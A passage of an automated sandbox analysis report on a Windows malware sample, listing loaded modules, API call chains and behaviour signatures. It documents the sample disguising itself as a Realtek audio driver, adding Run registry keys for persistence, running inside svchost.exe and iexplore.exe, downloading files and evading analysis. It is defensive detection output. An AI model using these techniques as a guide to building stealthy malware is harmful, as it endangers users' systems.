                            Source: C:\Users\user\Desktop\1.exeSection loaded: twext.dllJump to behavior
                            Source: C:\Users\user\Desktop\1.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\Desktop\1.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\Desktop\1.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\Desktop\1.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\Desktop\1.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\Desktop\1.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\Desktop\1.exeSection loaded: policymanager.dllJump to behavior
                            Source: C:\Users\user\Desktop\1.exeSection loaded: msvcp110_win.dllJump to behavior
                            Source: C:\Users\user\Desktop\1.exeSection loaded: ntshrui.dllJump to behavior
                            Source: C:\Users\user\Desktop\1.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\Desktop\1.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                            Source: C:\Users\user\Desktop\1.exeSection loaded: cscapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\1.exeSection loaded: shacct.dllJump to behavior
                            Source: C:\Users\user\Desktop\1.exeSection loaded: idstore.dllJump to behavior
                            Source: C:\Users\user\Desktop\1.exeSection loaded: twinapi.appcore.dllJump to behavior
                            Source: C:\Users\user\Desktop\1.exeSection loaded: samlib.dllJump to behavior
                            Source: C:\Users\user\Desktop\1.exeSection loaded: wlidprov.dllJump to behavior
                            Source: C:\Users\user\Desktop\1.exeSection loaded: samcli.dllJump to behavior
                            Source: C:\Users\user\Desktop\1.exeSection loaded: textshaping.dllJump to behavior
                            Source: C:\Users\user\Desktop\1.exeSection loaded: provsvc.dllJump to behavior
                            Source: C:\Users\user\Desktop\1.exeSection loaded: starttiledata.dllJump to behavior
                            Source: C:\Users\user\Desktop\1.exeSection loaded: acppage.dllJump to behavior
                            Source: C:\Users\user\Desktop\1.exeSection loaded: sfc.dllJump to behavior
                            Source: C:\Users\user\Desktop\1.exeSection loaded: msi.dllJump to behavior
                            Source: C:\Users\user\Desktop\1.exeSection loaded: aepic.dllJump to behavior
                            Source: C:\Users\user\Desktop\1.exeSection loaded: sfc_os.dllJump to behavior
                            Source: C:\Users\user\Desktop\1.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\Desktop\1.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\Desktop\1.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\Desktop\1.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\Desktop\1.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeSection loaded: rstrtmgr.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rstrtmgr.dllJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeSection loaded: rstrtmgr.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeSection loaded: rstrtmgr.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeSection loaded: rstrtmgr.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\Desktop\1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                            Source: 1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                            Source: 1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                            Source: 1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                            Source: 1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                            Source: 1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                            Source: 1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                            Source: 1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                            Source: 1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                            Source: 1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                            Source: 1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                            Source: 1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                            Source: 1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,0_2_0041CBE1
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00457186 push ecx; ret 0_2_00457199
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00457AA8 push eax; ret 0_2_00457AC6
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00434EB6 push ecx; ret 0_2_00434EC9
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03087186 push ecx; ret 4_2_03087199
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0308E55D push esi; ret 4_2_0308E566
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03087AA8 push eax; ret 4_2_03087AC6
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0308C98B push 700308CBh; retf 4_2_0308C999
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03064EB6 push ecx; ret 4_2_03064EC9
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: 5_2_00457186 push ecx; ret 5_2_00457199
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: 5_2_00457AA8 push eax; ret 5_2_00457AC6
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: 5_2_00434EB6 push ecx; ret 5_2_00434EC9
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00406EEB ShellExecuteW,URLDownloadToFileW,0_2_00406EEB
                            Source: C:\Users\user\Desktop\1.exeFile created: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeJump to dropped file

                            Boot Survival

                            barindex
                            Source: C:\Users\user\Desktop\1.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Realtek Audio-J15M0SJump to behavior
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,0_2_0041AADB
                            Source: C:\Users\user\Desktop\1.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Realtek Audio-J15M0SJump to behavior
                            Source: C:\Users\user\Desktop\1.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Realtek Audio-J15M0SJump to behavior
                            Source: C:\Users\user\Desktop\1.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Realtek Audio-J15M0SJump to behavior
                            Source: C:\Users\user\Desktop\1.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Realtek Audio-J15M0SJump to behavior
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,0_2_0041CBE1
                            Source: C:\Users\user\Desktop\1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                            Malware Analysis System Evasion

                            barindex
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0040F7E2 Sleep,ExitProcess,0_2_0040F7E2
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 3_2_02D7F7E2 Sleep,ExitProcess,3_2_02D7F7E2
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0303F7E2 Sleep,ExitProcess,4_2_0303F7E2
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: 5_2_0040F7E2 Sleep,ExitProcess,5_2_0040F7E2
                            Source: C:\Windows\SysWOW64\svchost.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcess
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeStalling execution: Execution stalls by calling Sleepgraph_3-48531
                            Source: C:\Users\user\Desktop\1.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,0_2_0041A7D9
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,3_2_02D8A7D9
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,4_2_0304A7D9
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,5_2_0041A7D9
                            Source: C:\Users\user\Desktop\1.exeEvaded block: after key decisiongraph_0-47617
                            Source: C:\Users\user\Desktop\1.exeEvaded block: after key decisiongraph_0-47593
                            Source: C:\Users\user\Desktop\1.exeAPI coverage: 6.3 %
                            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 6.2 %
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeAPI coverage: 6.2 %
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,0_2_0040928E
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,0_2_0041C322
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,0_2_0040C388
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,0_2_004096A0
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,0_2_00408847
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00407877 FindFirstFileW,FindNextFileW,0_2_00407877
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0044E8F9 FindFirstFileExA,0_2_0044E8F9
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,0_2_0040BB6B
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,0_2_00419B86
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,0_2_0040BD72
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 3_2_02D7928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,3_2_02D7928E
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 3_2_02D7C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,3_2_02D7C388
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 3_2_02D8C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,3_2_02D8C322
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 3_2_02D796A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,3_2_02D796A0
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 3_2_02D89B86 FindFirstFileW,FindNextFileW,FindNextFileW,3_2_02D89B86
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 3_2_02D7BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,3_2_02D7BB6B
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 3_2_02DBE8F9 FindFirstFileExA,3_2_02DBE8F9
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 3_2_02D78847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,3_2_02D78847
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 3_2_02D77877 FindFirstFileW,FindNextFileW,3_2_02D77877
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 3_2_02D7BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,3_2_02D7BD72
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0304C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,4_2_0304C322
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0303C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,4_2_0303C388
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0303928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,4_2_0303928E
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030396A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,4_2_030396A0
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0303BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,4_2_0303BB6B
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03049B86 FindFirstFileW,FindNextFileW,FindNextFileW,4_2_03049B86
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03038847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,4_2_03038847
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03037877 FindFirstFileW,FindNextFileW,4_2_03037877
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0307E8F9 FindFirstFileExA,4_2_0307E8F9
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0303BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,4_2_0303BD72
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: 5_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,5_2_0040928E
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: 5_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,5_2_0041C322
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: 5_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,5_2_0040C388
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: 5_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,5_2_004096A0
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: 5_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,5_2_00408847
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: 5_2_00407877 FindFirstFileW,FindNextFileW,5_2_00407877
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: 5_2_0044E8F9 FindFirstFileExA,5_2_0044E8F9
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: 5_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,5_2_0040BB6B
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: 5_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,5_2_00419B86
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: 5_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,5_2_0040BD72
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,0_2_00407CD2
                            Source: C:\Users\user\Desktop\1.exeFile opened: C:\Users\userJump to behavior
                            Source: C:\Users\user\Desktop\1.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                            Source: C:\Users\user\Desktop\1.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                            Source: C:\Users\user\Desktop\1.exeFile opened: C:\Users\user\AppDataJump to behavior
                            Source: C:\Users\user\Desktop\1.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\1.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                            Source: iexplore.exe, 00000003.00000002.3265896381.00000000031A6000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 00000003.00000003.2048445024.00000000031A6000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 00000003.00000002.3265831941.00000000030BB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeAPI call chain: ExitProcess graph end nodegraph_3-48558
                            Source: C:\Windows\SysWOW64\svchost.exeAPI call chain: ExitProcess graph end node
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeProcess information queried: ProcessInformationJump to behavior
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00434A8A
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,0_2_0041CBE1
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00443355 mov eax, dword ptr fs:[00000030h]0_2_00443355
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 3_2_02DB3355 mov eax, dword ptr fs:[00000030h]3_2_02DB3355
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03073355 mov eax, dword ptr fs:[00000030h]4_2_03073355
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: 5_2_00443355 mov eax, dword ptr fs:[00000030h]5_2_00443355
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_004120B2 GetProcessHeap,HeapFree,0_2_004120B2
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0043503C
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00434A8A
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0043BB71
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00434BD8 SetUnhandledExceptionFilter,0_2_00434BD8
